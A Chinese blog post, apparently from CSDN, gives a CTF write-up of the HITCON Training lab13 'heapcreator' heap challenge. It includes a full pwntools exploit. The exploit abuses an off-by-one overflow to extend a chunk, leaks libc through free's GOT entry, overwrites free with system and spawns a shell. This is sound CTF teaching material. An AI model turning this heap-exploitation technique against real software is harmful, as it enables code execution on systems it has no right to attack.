堆利用之chunk extend: HITCON tranining lab13

最新推荐文章于 2024-06-14 14:37:55 发布
最新推荐文章于 2024-06-14 14:37:55 发布
阅读量2.5k 收藏
点赞数
分类专栏: PWN 文章标签: linux 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/122539760
版权

64位ida分析程序,常见的目录结构;

通过静态分析 发现 edit 的时候 存在 off-by-one 漏洞:

红框标出的地方,可以多输入一个字节。

先看exp: 

from pwn import*
p = process("./heapcreator")
e = ELF("./heapcreator")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
context.log_level = "debug"

def create(size,content):
	p.recvuntil("Your choice :")
	p.sendline("1")
	p.recvuntil("Size of Heap :")
	p.sendline(str(size))
	p.recvuntil("Content of heap:")
	p.sendline(content)
def edit(index,content):
	p.recvuntil("Your choice :")
	p.sendline("2")
	p.recvuntil("Index :")
	p.sendline(str(index))
	p.recvuntil("Content of heap :")
	p.sendline(content)
	p.recvline()
def show(index):
	p.recvuntil("Your choice :")
	p.sendline("3")
	p.recvuntil("Index :")
	p.sendline(str(index))
def delete(index):
	p.recvuntil(":")
	p.sendline("4")
	p.recvuntil(":")
	p.sendline(str(index))
def exit():
	p.recvuntil(":")
	p.sendline("5")

create(24,'amazh')#0x18 + 0x10
create(16,'amazh')#0x10 + 0x10
edit(0,'/bin/sh\x00' +'a'*0x10+ '\x41')
delete(1)
create(0x30, p64(0) * 3 + p64(0x21) + p64(0x30) + p64(e.got['free'])) 
show(1)
p.recvuntil("Content : ")
data = p.recvuntil("Done !")
free_addr = u64(data.split("\n")[0].ljust(8, "\x00"))
#log.success(hex(free_data)
libc_base  = free_addr - libc.symbols['free']
log.success('libc base addr: ' + hex(libc_base))
system_addr = libc_base + libc.symbols['system']
edit(1, p64(system_addr))
#pause()
delete(0)

p.interactive()

解题思路:

首先创建了两个heap,大小分别是 0x18和 0x10,我们可以通过编辑heap0的content,从而溢出一个字节,来控制heap1 header的size位,从而实现extend。

extend之后 ,进行free(heap1) , 我们可以得到一个 0x41大小的chunk,然后我们再次malloc这个chunk 写入got地址 便可以泄露出free函数的真实地址  ,随后便可以实现任意写了。

cut_maize
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【逆向学习记录】分配中chunk&bins
卦星的专栏
03-23 3271
1 概述 学习的过程中,开始的时候,有个很难理解的东西,那个东西就是malloc,涉及到malloc就会涉及到chunk,实话说chunk这个东西的学习,确实经历了不少时间,总结一下,防止忘记 参考 Linux内存管理深入分析-上这篇文章详细将来chunk的进化过程,这里就不在深入查看了,深入浅出,是学习溢出基础的佳作 Linux内存管理深入分析-下这篇文章详细讲了bin的结构,并且被我大...
windowsland:HITCON CTF 2018
03-19
这个想法是利用Windows用户模式中的悬空指针利用安全取消链接 如果有人想直接学习该技术,请参阅unlink_chunk.cpp 脆弱性 bug1:泄漏 复制期间,所有的字符串输入都不以NULL字节结尾,例如human->name , teacher...
Chunk Extend/Overlapping | 拓展、重叠
SkYe's Blog
08-06 1591
拓展&溢出 绝大部分内容来自 CTF-WIKI ,内容引用用于学习记录 介绍 chunk extend漏洞的一种常见利用手法,通过 extend 可以实现 chunk overlapping 的效果。这种利用方法需要以下的时机和条件: 程序中存在基于的漏洞 漏洞可以控制 chunk header 中的数据 原理 chunk extend 技术能够产生的原因在于 ptmalloc 在对 chunk 进行操作时使用的各种宏。 在 ptmalloc 中,获取 chunk 块大小的操作如
好好说话之Chunk Extend/Overlapping
hollk’s blog
09-04 4639
这是进入领域的第二个知识点,Chunk Extend/Overlapping。不知道正在看这篇文章的你有没有一些拓展的思想,在了解的基础知识后有没有自己想过在中可能存在问题的点。我们可能从做第一道pwn题开始就知道要溢出、要泄露、要拿flag、拿shell,在知道了这些技巧之后看到shell这道题就过去了,可能也没想过为什么会这样,往往这些我们不在乎的东西才是同比场景的方法和思路 编写不易,如果能够帮助到你,希望能够点赞收藏加关注哦Thanks♪(・ω・)ノ
Chunk Extend and Overlapping(HITCON Trainging lab13)
九层台
08-13 600
数据结构 unsigned __int64 create_heap() { _QWORD *v0; // rbx signed int i; // [rsp+4h] [rbp-2Ch] size_t size; // [rsp+8h] [rbp-28h] char buf; // [rsp+10h] [rbp-20h] unsigned __int64 v5; // [r...
HITCON Trainging lab13 heapcreator
snowleopard_bin的博客
10-03 982
记录第一次不看任何writeup自己写出来的pwn题 前置知识: off by one chunk overlapping chunk extend 一开始先看程序打开哪些保护机制 可以改got表,并且有点要注意是没开PIE,这样就不必泄露函数地址计算基址了(如果开了,这题上没有存放函数指针的,我也不会泄露。。) 然后分析程序,挖漏洞 首先从建函数看数据结构 结构...
HITCON-Training lab10(uaf入门题)
像初雪一样自由洒落
03-08 716
题目下载地址:https://github.com/scwuaptx/HITCON-Training 哈哈哈,纪念一下明白的第一道题,虽然它真的很简单。。。 32位程序 三个功能,增、删、打印 程序给我们预留了后门函数 add函数,创建note会有两个块,分别是存放两个函数指针的8字节块和存放内容的块 这个示意图很清楚: ...
munmap_chunk(): invalid pointer:
weixin_35755188的博客
02-13 5519
这个错误消息通常表示程序试图释放一个无效的内存地址。“munmap_chunk”是指程序正在使用 munmap 函数释放内存,但发现了一个非法的指针,即不是一个有效的内存块地址。这可能是由于多次释放同一内存块导致的,或者是由于程序尝试释放一个未分配的内存块。在任何情况下,这都是一个严重的错误,需要立即修复。 ...
漏洞利用chunk扩展和重叠1
08-04
1、 申请两片内存,要求申请内存大小需范围落入 fastbin 范围内,并且两片内存尺寸和不 2、 memset 并打印第二片内存 3、 修改第一片内存的 mc
read-chunk:从文件中读取大块
05-26
$ npm install read-chunk 用法 const readChunk = require ( 'read-chunk' ) ; // foo.txt => hello readChunk . sync ( 'foo.txt' , 1 , 3 ) ; //=> 'ell' 原料药 readChunk(filePath,startPosition,长度) ...
promise-chunk:分块运行本机承诺列表
04-10
import promiseChunk from '@myrotvorets/promise-chunk' function * requestGenerator ( ) : Generator < Promise> > > { const ids = [ '81e' , 'a46' , 'SQIzfUkYJ' , 'JFPROfGtQ' , 'g-gQiPV-_' ] for ( let ...
玩转-漏洞的利用技巧.docx
01-10
溢出的利用思想是破坏内存管理的相关数据结构,如 arena、bin、chunk,或者破坏内存中的用户数据,如覆盖变量指针、函数指针、数据等。溢出的防护方法包括保护内存管理相关的数据结构,如 Heap Canary、对...
解决 Linux 和 Java 1.8 中上传中文名称图片报错问题
appearappear的博客
06-12 251
Linux 系统和 Java 1.8 中,当尝试上传含有中文名称的图片时,可能会遇到以下错误提示:为了解决这个问题,可以采取以下方法:在 Docker 的 中添加如下参数:Dockerfile使用以下命令启动 Java 程序,添加 参数:通过以上配置,确保了在启动 Java 程序时,使用了 UTF-8 编码,这样可以正确处理含有中文名称的文件,避免了报错问题的发生。3.5
嵌入式Linux系统编程 — 3.4 access、chmod和 umask函数修改文件访问权限
几度春风里的博客
06-09 932
文件的权限检查不仅讨论文件本身的权限,还需要涉及到文件所在目录的权限, 只有同时都满足了,才能通过操作系统的权限检查,进而才可以对文件进行相关操作;所以,程序当中对文件进行相关操作之前,需要先检查执行进程的用户是否对该文件拥有相应的权限。需要进行权限检查的文件路径。F_OK:检查文件是否存在R_OK:检查是否拥有读权限W_OK:检查是否拥有写权限X_OK:检查是否拥有执行权限检查项通过则返回 0,表示拥有相应的权限并且文件存在;
Ollama在MacOS、Linux本地部署千问大模型及实现WEB UI访问
最新发布
派大夏的博客
06-14 592
阿里通义千问发布了Qwen2,提供了0.5B~72B的量级模型,在​​Ollama官网​​可以搜索qwen2查看,本文提供了Ollama的下载(在线/离线安装)、Ollama运行模型、使用WebUI连接模型以及页面简单配置。总体还是比较简单的,更高阶的玩法,看小伙伴的反馈,后面更新比如自定义智能体、训练等。
Linux基础命令
威桑的博客
06-11 797
常见基础Linux命令
Linux下的动态链接和静态链接 及 调用libevent库函数的可执行文件无法正常运行情况剖析】
一起学习进步!
06-09 322
静态链接是指在编译时,将程序所依赖的函数或数据直接复制到最终的可执行文件中。这意味着可执行文件包含了程序运行所需的所有代码和数据。动态链接是指在运行时,程序所依赖的函数或数据从外部的共享库(shared library)中加载。这意味着可执行文件只包含了必要的引用信息,而实际的代码和数据则存储在外部的共享库中。
NVIDIA Jetson Linux 35.3.1-开发指南-Jetson软件架构
FREEDOM_X的专栏
06-11 747
下图显示了NVIDIA®Jetson™Linux架构。以下部分描述了每个模块的组件。在本开发人员指南或其他地方,许多组件的名称是指向组件主留档的链接。一些组件具有带有附加描述的单独链接。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值